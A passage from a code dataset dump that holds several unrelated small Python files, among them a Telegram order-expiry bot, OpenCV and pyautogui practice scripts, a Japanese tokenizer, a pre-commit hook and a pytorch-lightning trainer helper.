import logger\nfrom .config import TelegramConfig\nfrom .utils import pd\n\n\nbot = telegram.Bot(token=TelegramConfig.TELEGRAM_TOKEN)\n# Название столбца для даты\nEXPIRY_DATE_NAME = \"expires_in\"\n# Название столбца для отправки в бот в случае просрочки\nORDER_NAME = \"order_name\"\n\n\ndef send_message(bot, message):\n    \"\"\"Функция отправки сообщения в бот.\"\"\"\n    try:\n        bot.send_message(chat_id=TelegramConfig.TELEGRAM_CHAT_ID, text=message)\n    except telegram.error.TelegramError as error:\n        logger.error(f\"Сбой отправки: {error}\")\n    else:\n        logger.debug(f\"Отправлено сообщение: {message}\")\n\n\ndef find_expired_in_timedelta(data_dict, current_date):\n    \"\"\"Поиск заказов с истекшим сроком\"\"\"\n    clients_list = []\n    for row, expiry_date_timestamp in data_dict.get(EXPIRY_DATE_NAME).items():\n        expiry_date = pd.to_datetime(expiry_date_timestamp).date()\n        if current_date > expiry_date:\n            clients_list.append(row)\n\n    return clients_list\n\n\ndef prepare_message_with_clients(data_dict, clients_list):\n    \"\"\"Подготовка сообщения с клиентами из списка\"\"\"\n    message = \"\"\n    if len(clients_list):\n        for number in clients_list:\n            client_name = data_dict.get(ORDER_NAME).get(number)\n            expiry_date = data_dict.get(EXPIRY_DATE_NAME).get(number)\n            message += (\n                f\"Order number {client_name}.\" f\" expiry date: {expiry_date}\\n\"\n            )\n\n    return message\n\n\ndef check_expires_dates(data):\n    \"\"\"Точка входа для бота, вызывается из tasks.py\"\"\"\n    current_date = dt.date.today()\n    data_dict = data.to_dict()\n    try:\n        orders_list = find_expired_in_timedelta(data_dict, current_date)\n        new_message = prepare_message_with_clients(data_dict, orders_list)\n        if new_message == \"\":\n            new_message = f\"Today {current_date} there are no expiring orders\"\n        send_message(bot, new_message)\n    except Exception as error:\n        new_message = f\"Bot task finished with error: {error}\"\n        send_message(bot, new_message)\n","repo_name":"Bigbrotherx/Order_controller","sub_path":"order_controll_app/backend/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39022504604","text":"# Mouse locator\n\nimport pyautogui\nimport time\nprint(\"Ctrl + C to close\")\ntry:\n    while True:\n        x, y = pyautogui.position()\n        pix = pyautogui.screenshot().getpixel((x, y))\n        for_print = 'X:' + str(x).rjust(4) + ' Y:' + str(y).rjust(4)\n        for_print += ' RGB: (' + str(pix[0]).rjust(3) + ',' + \\\n            str(pix[1]).rjust(3) + ',' + str(pix[2]).rjust(3) + ')'\n        print(for_print, end='')\n        print('\\b' * len(for_print), end='', flush=True)\nexcept KeyboardInterrupt:\n    print('\\nBye!')\n    exit()\n","repo_name":"rhaeyx/sheets","sub_path":"mouse.py","file_name":"mouse.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71057525533","text":"S = str(input())\nS = list(S)\n\nl_count = 0\nif (S[0] != \"A\") or ('C' not in S[2:-1]) or (\"C\" in S[:1] or \"C\" in S[-1]):\n    print(\"WA\")\nelse:\n    for i in S:\n        if i.isupper():\n            l_count += 1\n    \n    if l_count != 2:\n        print(\"WA\")\n    else:\n        print(\"AC\")\n\n","repo_name":"EduardoFMC/UNB","sub_path":"prog/python/tep 2020.1/lista 1/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33758432666","text":"#!/usr/bin/env python\n\"\"\"Pre-commit hook for 
PyASTrix.\n\n\"\"\"\n\nimport subprocess\nimport sys\n\nif __name__ == \"__main__\":\n    files = [\n        f for f in sys.argv if any(\n            [f.endswith(f\".{ext}\") for ext in (\"yaml\", \"yml\", \"py\")]\n        )\n    ]\n    if len(files) == 0:\n        print(\"No files to check\")\n        exit(0)\n    commands = [\"pyastrx\", \"-l\", \"-f\", *files]\n    if \"-q\" in sys.argv:\n        commands.append(\"-q\")\n    # a list of arguments must not be combined with shell=True,\n    # otherwise only the first element would be executed on POSIX\n    process = subprocess.Popen(\n        commands\n    )\n    process.communicate()\n    exit_code = process.wait()\n\n    sys.exit(exit_code)\n","repo_name":"pyastrx/pyastrx","sub_path":".pre-commit-hook/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"32"} +{"seq_id":"17921507077","text":"import fugashi\nimport jaconv\n\n\ndef convert_furigana(tagger, text):\n    words = tagger(text)\n    output = list()\n    for word in words:\n\n        word_dict = dict()\n        word_dict['surface'] = word.surface\n        output.append(word_dict)\n\n        if word.feature.goshu == '記号' or word.feature.pos1 == '代名詞' or word.feature.pos2 == '固有名詞':\n            continue\n\n        if word.feature.pos1 == '接尾辞' or word.feature.pos2 == '数詞':\n            continue\n\n        if not word.feature.kana:\n            continue\n\n        hira = jaconv.kata2hira(word.feature.kana)\n        if word.feature.kana != '' and hira != word.surface:\n            word_dict['furi'] = jaconv.kata2hira(word.feature.kana)\n            if word.surface != word.feature.lemma:\n                word_dict['lemma'] = word.feature.lemma\n                word_dict['orthBase'] = word.feature.orthBase\n                word_dict['hiraBase'] = jaconv.kata2hira(word.feature.kanaBase)\n            # '五段-ラ行'\n            word_dict['cType'] = word.feature.cType\n            # '動詞'\n            word_dict['pos1'] = word.feature.pos1\n            # '普通名詞', '一般'\n            word_dict['pos2'] = word.feature.pos2\n\n    return output\n\n\ndef get_i_adjectives(word_list):\n    tagger = fugashi.Tagger()\n    out_list = list()\n    for word in word_list:\n        tagged = tagger(word)\n        # want to tag just one word only\n        if len(tagged) != 1:\n            continue\n        if tagged[0].feature.cType == '形容詞':\n            out_list.append(tagged[0].surface)\n    return out_list\n\n\ndef get_na_adjectives(word_list):\n    tagger = fugashi.Tagger()\n    out_list = list()\n    for word in word_list:\n        tagged = tagger(word)\n        # want to tag just one word only\n        if len(tagged) != 1:\n            continue\n        if tagged[0].feature.pos1 == '形状詞':\n            out_list.append(tagged[0].surface)\n    return out_list\n\n\ndef get_verbs(word_list):\n    tagger = fugashi.Tagger()\n    out_list = list()\n    for word in word_list:\n        tagged = tagger(word)\n        # want to tag just one word only\n        if len(tagged) != 1:\n            continue\n        if tagged[0].feature.pos1 == '動詞':\n            out_list.append(tagged[0].surface)\n    return out_list\n","repo_name":"techckh/jp-tokenizer","sub_path":"src/jp_tokenizer/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24866312274","text":"name = input()\nprint(f\"hello, {name}!\")\n\n# Sequences \n\nname = 'Taqi' # Variable\nprint(name[0]) # first character in the string\n\n\ncoordinates = (10, 15.15, 'taqi') # Tuple\nprint(coordinates[0])\n\n\nname = [\"Taqi\", \"Turab\", \"Ali\"] # List multi data types\nprint(name[0])\n\n#Sets no duplicate items\n\ns = set()\ns.add(1)\ns.add(3)\ns.add(3) \nprint(s) # {1, 3}\n\n# Dictionary, key value data type\ndate = { 'name':'Taqi', 'age': 18} # dictionary\nprint(date['name'])\n\n# Looping\n\nfor i in range(10):\n\tprint(i) # 0,1,2,3,4,5,6,7,8,9\n\n\nnames = ['Taqi', 'Turab', 'Ali']\nfor name in names:\n\tprint(name) 
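\n\n# Illustrative addition (not part of the original lecture file): dictionaries\n# can be looped over as well; iterating over a dict yields its keys\nfor key in date:\n\tprint(key, date[key])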
\n\n\n","repo_name":"ArchTaqi/cs50","sub_path":"Lecture.2.Flask/program1.py","file_name":"program1.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"72478724572","text":"from tensorflow.python.keras.models import load_model\nfrom settings import CURRENT_DATA_VERSION\nfrom src.features.helpers.data_load import get_train_source, get_model_name, get_train_val_test_data, get_model_type, \\\n get_img_train_val_test_data\nfrom src.features.helpers.metrics import get_f1\nfrom src.features.helpers.training import plot_prediction_results, get_model_path, plot_confusion_matrix\n\nML_MODEL = get_model_name()\n\nmodel_type = get_model_type()\n\ntrain_source = get_train_source()\n\nif CURRENT_DATA_VERSION == 'v4':\n x_train, y_train, x_val, y_val, x_test, y_test = get_img_train_val_test_data()\nelse:\n x_train, y_train, x_val, y_val, x_test, y_test = get_train_val_test_data(train_source, version=CURRENT_DATA_VERSION)\n\nmodel = load_model(\n get_model_path(model_type, ML_MODEL),\n custom_objects={'f1_score': get_f1()}\n)\ny_pred_train_classes = (model.predict(x_train) > 0.5).astype(\"int32\")\nplot_confusion_matrix(y_pred_train_classes, y_train, [0, 1], 'Training', ML_MODEL, model_type)\n\ny_pred_val_classes = (model.predict(x_val) > 0.5).astype(\"int32\")\nplot_confusion_matrix(y_pred_val_classes, y_val, [0, 1], 'Validation', ML_MODEL, model_type)\n\ny_pred_test_classes = (model.predict(x_test) > 0.5).astype(\"int32\")\nplot_confusion_matrix(y_pred_test_classes, y_test, [0, 1], 'Test', ML_MODEL, model_type)\n\nplot_prediction_results(\n y_pred_train_classes,\n y_train,\n y_pred_val_classes,\n y_val,\n y_pred_test_classes,\n y_test,\n ML_MODEL,\n model_type\n)\n","repo_name":"askoki/nfl_dpi_prediction","sub_path":"src/features/helpers/evaluate_model.py","file_name":"evaluate_model.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38242229674","text":"from Optimizer import *\n\nimport argparse\nimport time\n\nfrom datetime import timedelta\n\nparser = argparse.ArgumentParser(\n prog=\"ACR Project\",\n description=\"Automatic Content Recognition of songs in Hebrew.\",\n epilog=\"By Jonathan Eddie Amir for Tel Hai College.\"\n)\nparser.add_argument('-v', '--verbose', action='store_true')\nparser.add_argument('-p', '--path', default=OPTIONS[\"RecordingPath\"])\nparser.add_argument('-e', '--extension', default=OPTIONS[\"RecordingExtension\"])\nparser.add_argument('-sr', '--sample-rate', default=OPTIONS[\"SampleRate\"], type=Integer)\nparser.add_argument('-c', '--channels', default=OPTIONS[\"Channels\"], type=Integer)\nparser.add_argument('-n', '--num-fft', default=OPTIONS[\"NFFT\"], type=Integer)\nparser.add_argument('-l', '--hop-length', default=OPTIONS[\"HopLength\"], type=Integer)\nparser.add_argument('-w', '--window-length', default=OPTIONS[\"WindowLength\"], type=Integer)\nparser.add_argument('-th', '--threshold', default=OPTIONS[\"Threshold\"], type=Integer)\nparser.add_argument('-d', '--distance', default=OPTIONS[\"Distance\"], type=Integer)\n# TODO: Add new OPTIONS members.\nargs = parser.parse_args()\n\nif not OPTIONS[\"COLAB\"]:\n sd.default.samplerate = OPTIONS[\"SampleRate\"] # Currently unused, as we know each file's sample rate\n sd.default.channels = OPTIONS[\"Channels\"] # Set sound-device's default to Stereo\n\n\n# Utilities\ndef example_load() -> (plt.Figure, plt.Axes):\n \"\"\"\n 
Loads the 'choice' and 'nutcracker' example file from the librosa example library as Track instances.\n\n :return: Plotted figure & axes\n :rtype: (plt.Figure, plt.Axes)\n \"\"\"\n _track1 = Track(librosa.ex('choice', hq=True))\n _track2 = Track(librosa.example('nutcracker'))\n _fig, _axs = plt.subplots(2, 2)\n _track1.plot_stft_and_constellation(axs=_axs[0], fig=_fig)\n _track2.plot_stft_and_constellation(axs=_axs[1], fig=_fig)\n return _fig, _axs\n\n\n# Main Program\ndef main() -> Return:\n \"\"\"\n The Main() function. Provides a user interface for the program.\n\n :return: Did the function complete successfully?\n :rtype: Return\n \"\"\"\n # Variables\n print(\"Hello! Welcome to the ACR Project!\")\n running = True\n\n # Commands\n def load() -> Return:\n \"\"\"Initialize a demo Track list.\"\"\"\n # nonlocal database\n _input = input(\"Would you like to import a song directory into the database? [y]es / [n]o: \")\n if _input.lower() in [\"true\", \"t\", \"yes\", \"y\"]:\n OPTIONS[\"DatabasePath\"] = input(\"Please specify the path to the directory of songs: \")\n cache_database_by_track()\n print(\"Database loaded successfully!\")\n else:\n _input = input(\"Please specify the path to the cache file you want added to the database: \")\n try:\n _temp: HashSet = load_from_pickle(_input)\n database.append_hashes(_temp)\n print(\"Cache loaded successfully!\")\n except FileNotFoundError:\n print(\"File not found, please try again later.\")\n return Return.FILES_ERROR\n return Return.SUCCESS\n\n def terminate() -> Return:\n \"\"\"Terminate the program.\"\"\"\n nonlocal running\n # stop()\n running = False\n return Return.SUCCESS\n\n # def play() -> Return:\n # \"\"\"Play a Track by ID from user.\"\"\"\n # print(\"Available Tracks:\")\n # for _i in range(len(database)):\n # print(f\"{_i}: {database[str(_i)].title}\")\n # _track_title = input(\"Please enter Track title:\")\n # try:\n # if _track_title == \"\":\n # print(\"Cancelling...\")\n # return Return.CANCEL\n # _track: Track = database[_track_title]\n # _track.play()\n # return Return.SUCCESS\n # except ValueError:\n # print(\"Not a valid Track title. Please try again.\")\n # return Return.VALUE_ERROR\n # # except IndexError:\n # # print(\"Track ID out of range. Please try again.\")\n # # return Return.INDEX_ERROR\n # except sd.PortAudioError:\n # print(\"Error playing Track. Please try again.\")\n # return Return.AUDIO_ERROR\n # pass\n #\n # def stop() -> Return:\n # \"\"\"Stop playing all currently playing audios on sound-device.\"\"\"\n # if OPTIONS[\"COLAB\"]:\n # return Return.COLAB_ERROR\n # sd.stop()\n # return Return.SUCCESS\n\n def record(wait: bool = True, save: bool = True, add: bool = False,\n ext: AnyStr = OPTIONS[\"RecordingExtension\"]) -> Return:\n \"\"\"Record from sound-device.\"\"\"\n if OPTIONS[\"COLAB\"]:\n print(\"This functionality is unavailable for Google Colab. Please use a sample file, instead.\")\n return Return.COLAB_ERROR\n try:\n _duration = float(\n input(f\"Please enter recording Duration (seconds, Default={OPTIONS['DefaultDuration']}):\") or OPTIONS[\n \"RecordingDuration\"])\n except ValueError:\n print(\"Duration invalid. Please try again.\")\n return Return.VALUE_ERROR\n if OPTIONS[\"SampleRate\"] is None:\n try:\n _sr = int(input(f\"Please enter Sample Rate (Hz, Default={OPTIONS['DefaultSampleRate']}):\") or OPTIONS[\n \"SampleRate\"])\n except ValueError:\n print(\"Sample Rate invalid. 
Please try again.\")\n return Return.VALUE_ERROR\n else:\n _sr = OPTIONS[\"SampleRate\"]\n _recording = sd.rec(int(_duration * _sr))\n if wait:\n sd.wait() # Wait for recording to finish.\n _track = Track(f'{OPTIONS[\"RecordingPath\"]}/Recording - {timestamp()}.{OPTIONS[\"RecordingExtension\"]}')\n _track._sr = _sr\n _track._y = _recording\n if save:\n if not os.path.exists(OPTIONS[\"RecordingPath\"]):\n # Create \"Recordings\" folder if one does not exist. (SoundFile can't mkdir)\n os.mkdir(OPTIONS[\"RecordingPath\"], mode=OPTIONS[\"MakeDirMode\"])\n sf.write(f\"{_track.title}.{ext}\", _track.y, _track.sr) # Save recording to file.\n # TODO: Soundfile takes a while to save the recording - is it possible to block Python in the meantime?\n if add:\n database.append(_track) # TODO: Make sure this works.\n return Return.SUCCESS\n\n def append() -> Return:\n \"\"\"Append a new Track to the database using soundfile.\"\"\"\n _path = input(\"Please enter the filepath of the Track you would like to add (.wav, 44100Hz SR): \")\n if sf.check_format(_path):\n _track = Track(_path)\n database.append(_track)\n return Return.SUCCESS\n return Return.FILES_ERROR\n\n def match() -> Return:\n \"\"\"Search for a Track using a Sample soundfile.\"\"\"\n _path = input(\"Please enter the filepath of the Sample you would like to search with (.wav, 44100Hz SR): \")\n # if sf.check_format(_path):\n _track = Track(_path)\n _hashes = _track.hashes\n _title = database.match_from_sample(sample=_hashes)\n print(f\"Match Found! {_title}\")\n return Return.SUCCESS\n # return Return.INDEX_ERROR # No match found.\n\n def optimize() -> Return:\n \"\"\"Optimizes various window parameters.\"\"\"\n print(\"Please wait while optimizing...\")\n best_params, best_score = optimize_parameters()\n print(\"Training Results:\", best_params, best_score)\n return Return.SUCCESS\n\n # Command List\n _commands = dict()\n for _command in [load, terminate, record, append, match, optimize]: # play, stop TODO: Add all commands here!\n _commands[_command.__name__] = _command\n\n # Main Loop\n while running:\n print(\"\\nAvailable Commands:\")\n print(list(_commands.keys()))\n _command_name = input(\"Please enter a command:\").lower() # Case-insensitive.\n if _command_name not in _commands.keys():\n print(\"Command not found. Please try again.\")\n continue\n _status_code = _commands[_command_name]() # TODO: Handle status code\n print(\"Goodbye!\")\n return Return.SUCCESS\n\n\n# TODO:\n# COMPLETE: Change Sample Rate -> Higher SR = shorter higher pitch\n# COMPLETE: Experiment with cross-referencing librosa, soundfile, python-sounddevice -> All are based on NumPy.\n# COMPLETE: Basic Menu -> Currently good-faith programmer-only.\n# COMPLETE: Playback -> Not tested with relative/absolute path.\n# COMPLETE: Recording (python-sounddevice = NumPy / pyaudio = byte) -> Used python-sounddevice, as it's based on NumPy.\n# COMPLETE: Change STFT window size\n# COMPLETE: Initial database -> Ripped Home CDs, will rip friends' CDs in the future.\n# COMPLETE: Options struct\n# COMPLETE: Show patch as window (8x8, 3x3, ...). Use np.max. Control target area / k parameters. 
(5 sec, 1024 bins)\n# COMPLETE: Window - 140ms ~ 500ms, ~10 in range, histogram points in window, threshold,\n# IN PROGRESS: Play with peak_find parameters to affect Constellation.\n# NOTE: Mode5, MDA256, CRC checksum\n# NOTE: matlab find, SIMD, parameter sweep, scipy research\n\nif __name__ == \"__main__\":\n database: HashDatabase = HashDatabase() # Extracted for debugging purposes\n if not OPTIONS[\"DEBUG\"]:\n try:\n database = load_from_pickle(os.path.join(OPTIONS[\"CachePath\"], OPTIONS[\"CacheFile\"]))\n except FileNotFoundError:\n print(\"No cache found, proceeding with empty database...\")\n main()\n else:\n print(f\"Starting! {timestamp()}\")\n track: Track = Track(OPTIONS[\"FullFile\"])\n start: Float = time.time()\n cached: bool = OPTIONS[\"CACHED\"]\n titles: List[AnyStr] = get_titles(cached) if cached else cache_database_by_track(OPTIONS[\"DatabasePath\"], True)\n titles = get_titles()\n hashes = {}\n for filename in os.listdir(OPTIONS[\"DatabasePath\"]):\n if not filename.endswith(OPTIONS[\"RecordingExtension\"]):\n continue\n print(f\"Hashing {filename}...\")\n track = Track(os.path.join(f'{OPTIONS[\"DatabasePath\"]}/{filename}'))\n _hashes = track.hashes # hashes_from_cached_constellation(title)\n for key in _hashes:\n if key not in hashes:\n hashes[key] = {}\n for _title in _hashes[key]:\n hashes[key][_title] = _hashes[key][_title]\n save_as_pickle(\"Hashes.pkl\", hashes)\n # tracklist: TrackList = tracklist_from_directory()\n runtime: Float = time.time() - start\n print(f\"Done! {timedelta(seconds=runtime)} = {len(titles)} songs loaded!\")\n","repo_name":"djohoe28/ACR_Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29955256958","text":"import cv2\r\nimport numpy as np\r\nfrom PIL import ImageFont, ImageDraw, Image\r\n\r\n# 讀取圖片\r\n'''\r\nm1 = cv2.imread(\"1.jpg\", 1) #後面的0-2就是黑到白 灰階\r\n# m1 = cv2.cvtColor(m1, cv2.COLOR_BGR2HSV) #BGR轉HSV\r\nm2 = cv2.cvtColor(m1, cv2.COLOR_BGR2GRAY)\r\n# m2 = cv2.cvtColor(m1, cv2.COLOR_BGR2GRAY) #BGR轉灰階 \r\n# m1 = cv2.cvtColor(m1, cv2.COLOR_GRAY2BGR) #GRAY轉BGR\r\ncv2.imwrite(\"2.jpg\", m2)\r\n#畫質不影響的話就用png\r\ncv2.imwrite(\"8.jpg\", m2, [cv2.IMWRITE_JPEG_QUALITY, 100])\r\n\r\nprint(m1.shape[0])\r\nprint(m1.shape[1])\r\nprint(m1.shape)\r\n\r\nprint(m2.shape[0]) #高\r\nprint(m2.shape[1]) #寬\r\nprint(m2.shape)\r\n\r\ncv2.imshow(\"Photo - 1\", m1)\r\ncv2.imshow(\"Photo - 1\", m2)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\nwrite(\"4.jpg\", m1, [cv2.IMWRITE_JPEG_QUALITY, 0])\r\ncv2.imwrite(\"3.jpg\", m1, [cv2.IMWRITE_JPEG_QUALITY, 50])\r\ncv2.imwrite(\"5.jpg\", m1, [cv2.IMWRITE_JPEG_QUALITY, 100]) \r\n\r\ncv2.imwrite(\"6.jpg\", m2, [cv2.IMWRITE_JPEG_QUALITY, 0])\r\ncv2.imwrite(\"7.jpg\", m2, [cv2.IMWRITE_JPEG_QUALITY, 50])\r\n\r\n'''\r\n\r\n# 讀攝影機\r\n'''\r\np1 = cv2.VideoCapture(0)\r\nwhile p1.isOpened()==True:\r\n ret, m1=p1.read() #有沒有讀到圖片 有兩個變數 True/False\r\n cv2.imshow(\"Photo - 1\", m1)\r\n if cv2.waitKey(33)!=-1: #每秒顯示幀數(FPS) eg. 
每分鐘一千毫秒 除以30 約等於33.33 所以寫33\r\n break\r\ncv2.destroyAllWindows() \r\n'''\r\n# 讀影片\r\n'''\r\np1 = cv2.VideoCapture(\"dog.mp4\")\r\nprint(\"高:\", p1.get(4))\r\nprint(\"寬:\", p1.get(3))\r\nprint(\"總影格:\", p1.get(7))\r\nprint(\"FPS:\", p1.get(5))\r\n\r\np1.set(1,1234) #當前的影格\r\n\r\nwhile p1.isOpened()==True:\r\n ret, m1=p1.read() #有沒有讀到圖片 有兩個變數 True/False\r\n if ret==True:\r\n print(\"當前影格:\",p1.get(1))\r\n cv2.imshow(\"Photo - 1\", m1)\r\n if cv2.waitKey(33)!=-1: #每秒顯示幀數(FPS) eg. 每分鐘一千毫秒 除以30 約等於33.33 所以寫33\r\n break #從這格開始播放\r\n else: #播了這格就關起來 沒有else這兩行就可以繼續播\r\n break \r\ncv2.destroyAllWindows()\r\n'''\r\n# 把攝影機畫面存成影片 或是把影片擷取特定的影格 擷取一小段\r\n'''\r\np1 = cv2.VideoCapture(\"Asuka_magic.mp4\")\r\nprint(\"高:\", p1.get(4))\r\nprint(\"寬:\", p1.get(3))\r\nprint(\"總影格:\", p1.get(7))\r\nprint(\"FPS:\", p1.get(5))\r\nf = cv2.VideoWriter_fourcc(*'MP4V')\r\nw = int(p1.get(3)) # 傳回來的長寬會是小數 所以要int成整數下面才能用\r\nh = int(p1.get(4))\r\np2 = cv2.VideoWriter(\"part.mp4\", f, 40, (w, h))\r\ni = 0 # 設參數給後面只錄一小段用\r\nwhile p1.isOpened() == True:\r\n ret, m1 = p1.read() # 有沒有讀到圖片 有兩個變數 True/False\r\n if ret == True:\r\n i += 1\r\n if i > 2000 and i <= 2400:\r\n p2.write(m1)\r\n # 第三秒錄到第十秒 (30fps*3(第三秒) 所以是90) \r\n cv2.imshow(\"Image 1\", m1)\r\n if cv2.waitKey(33) != -1: # 每秒顯示幀數(FPS) eg. 每分鐘一千毫秒 除以30 約等於33.33 所以寫33\r\n break # 從這格開始播放\r\n # else: #播了這格就關起來 沒有else這兩行就可以繼續播\r\n # break\r\np2.release()\r\ncv2.destroyAllWindows()\r\n'''\r\n# 畫畫\r\n\r\nm1 = np.full(\r\n (150, 300, 3),\r\n (150, 250, 180),\r\n np.uint8\r\n)\r\ncv2.line(m1, (30, 40), (50, 40), (0, 170, 0), 5)\r\ncv2.line(m1, (30, 20), (30, 40), (0, 170, 0), 5)\r\ncv2.line(m1, (50, 20), (50, 40), (0, 170, 0), 5)\r\ncv2.line(m1, (70, 40), (90, 40), (0, 170, 0), 5)\r\ncv2.line(m1, (70, 30), (90, 30), (0, 170, 0), 5)\r\ncv2.line(m1, (70, 22), (70, 30), (0, 170, 0), 5)\r\ncv2.line(m1, (90, 22), (90, 30), (0, 170, 0), 5)\r\ncv2.line(m1, (80, 20), (80, 40), (0, 170, 0), 5)\r\n\r\ncv2.circle(m1, (125, 30), 20, (0, 170, 0), 2) # 畫圓形\r\n\r\nm1 = Image.fromarray(m1)\r\n\r\nf = ImageFont.truetype(\"msgothic.ttc\", 50)\r\nImageDraw.Draw(m1).text((50, 70), \"齋藤飛鳥\", (0, 87, 87), f)\r\nm1 = np.array(m1)\r\n\r\ncv2.imshow(\"Image 1\", m1)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n\r\n'''\r\nm1 = cv2.imread(\"1.jpg\", 1)\r\n# m2=np.full(m1.shape,100,np.uint8)\r\n\r\n# m3=cv2.add(m1,m2) #加法最高是加到白色\r\n# m3=cv2.subtract(m1,m2)\r\n# m3=cv2.absdiff(m1,m2)\r\n# m3=cv2.divide(m1,m2)\r\n# m3=cv2.multiply(m3,m2)\r\n# m3=cv2.bitwise_not(m3,m2) #not 指令 色相相反\r\n# m3=m1+255\r\n# w=300\r\n# h=int((w/m1.shape[1])*m1.shape[0])\r\n# h=300\r\n# w=int((h/m1.shape[0])*m1.shape[1])\r\n\r\n#m2=cv2.flip(m1,-1)\r\n# d=cv2.getRotationMatrix2D((300,300)), 45, 1)\r\n# m2=cv2.warpAffine(m1, d, (500,500))\r\n\r\nm1 = cv2.imread(\"image/1.jpg\", 1)\r\nm2 = np.full(m1.shape,255,np.uint8)\r\n# m2[100:250,100:250]=m1[50:200,100:250]\r\n# m2[:,100:250]=m1[:,100:250] #高度都留著 切寬度而已\r\nm1[50:200,100:250]=255\r\n\r\ncv2.imshow(\"Image 1\", m1[:,:,2])\r\ncv2.imshow(\"Image 2\", m2)\r\n# cv2.imshow(\"Image 3\",m3)\r\ncv2.imshow(\"Image 2\", m1[50:200,100:250]) #裁切\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n'''\r\n","repo_name":"tamagoyaki-chiu/python_practice","sub_path":"2020-07-10/2020-07-10.py","file_name":"2020-07-10.py","file_ext":"py","file_size_in_byte":4843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10480052294","text":"from funcy_chain import getter\n\n\ndef test_long_path(Chain):\n data = [{\"a\": {\"b\": {\"c\": [1, 2, 
{\"d\": [3, {1: 2}]}]}}}]\n assert Chain(data).map(getter([\"a\", \"b\", \"c\", 2, \"d\", 1, 1])).value == [2]\n\n\ndef test_names(Chain):\n data = {\n \"user1\": {\n \"firstname\": \"Alice\",\n \"lastname\": \"Liddle\",\n },\n \"user2\": {\n \"firstname\": \"Bob\",\n \"lastname\": \"Kennedy\",\n },\n }\n names = (\n Chain(data).items().map(getter([1, \"lastname\"], [1, \"firstname\"])).sort().map(\", \".join)\n ).value\n assert names == [\"Kennedy, Bob\", \"Liddle, Alice\"]\n","repo_name":"taleinat/funcy-chain","sub_path":"test/test_getter.py","file_name":"test_getter.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"73809087772","text":"import cothread\nimport random\n\ndef worker(n):\n for i in range(25):\n print(f\"{n}\", end=\"\")\n cothread.Sleep(random.random() * 0.5) # suspend cothread \n print()\n\nthreads = []\nfor n in range(1, 5):\n t = cothread.Spawn(worker, n)\n threads.append(t)\n\ncothread.Yield() # wait for other cothreads\n\n# the cothread will terminate when we reach the end of the program\n# therefore we must wait for the cothreads to complete\nfor t in threads:\n t.Wait()\n","repo_name":"zaeemnajeeb/Python_training_diamond","sub_path":"src/36 EPICS/cothreads/01-yielding.py","file_name":"01-yielding.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35886682747","text":"\"\"\"Utilities to interact with pytorch-lightning.\n\"\"\"\n\nimport dataclasses\nimport logging\nimport os\nfrom typing import Any, Dict, List, Optional, Union\n\nimport pytorch_lightning\nimport pytorch_lightning.callbacks\nimport pytorch_lightning.plugins\n\nimport torch\nimport torch.distributed\nfrom pytorch_lightning.plugins.environments.cluster_environment import ClusterEnvironment\n\n\nlog = logging.getLogger(__name__)\n\n@dataclasses.dataclass\nclass TrainingConfiguration:\n \"\"\"Base configuration for training.\n\n Attributes\n ----------\n max_epochs : int\n Maximum number of epochs to train for.\n num_gpus : int\n Number of GPUs to use.\n mixed_precision : bool\n If `True`, uses 16-bit training.\n ligthning\n Additional arguments to pass when creating the pytorch-lightning trainer.\n \"\"\"\n max_epochs: int = 30\n num_gpus: int = 1\n mixed_precision: bool = False\n lightning: Dict[str, Any] = dataclasses.field(default_factory=dict)\n\n\ndef make_trainer(config: TrainingConfiguration, **kwargs) -> pytorch_lightning.Trainer:\n \"\"\"Creates a new `pytorch_lightning.Trainer` according to the given configuration.\n\n Parameters\n ----------\n config : TrainingConfiguration\n Configuration for the trainer to create.\n **kwargs\n Additional keyword arguments which are passed to the `pytorch_lightning.Trainer` constructor.\n \"\"\"\n callbacks = [\n pytorch_lightning.callbacks.ModelCheckpoint(\n save_top_k=-1,\n filename='epoch_{epoch}',\n auto_insert_metric_name=False),\n pytorch_lightning.callbacks.ModelCheckpoint(\n monitor='validation/loss',\n filename='epoch_{epoch}_vloss_{validation/loss:.3f}',\n auto_insert_metric_name=False,\n save_top_k=1),\n pytorch_lightning.callbacks.LearningRateMonitor(),\n ]\n\n if config.num_gpus > 0:\n callbacks.append(pytorch_lightning.callbacks.GPUStatsMonitor())\n\n trainer_kwargs = {\n **config.lightning\n }\n\n\n trainer_kwargs['gpus'] = config.num_gpus\n trainer_kwargs['max_epochs'] = config.max_epochs\n\n if config.num_gpus > 1:\n store_path = 
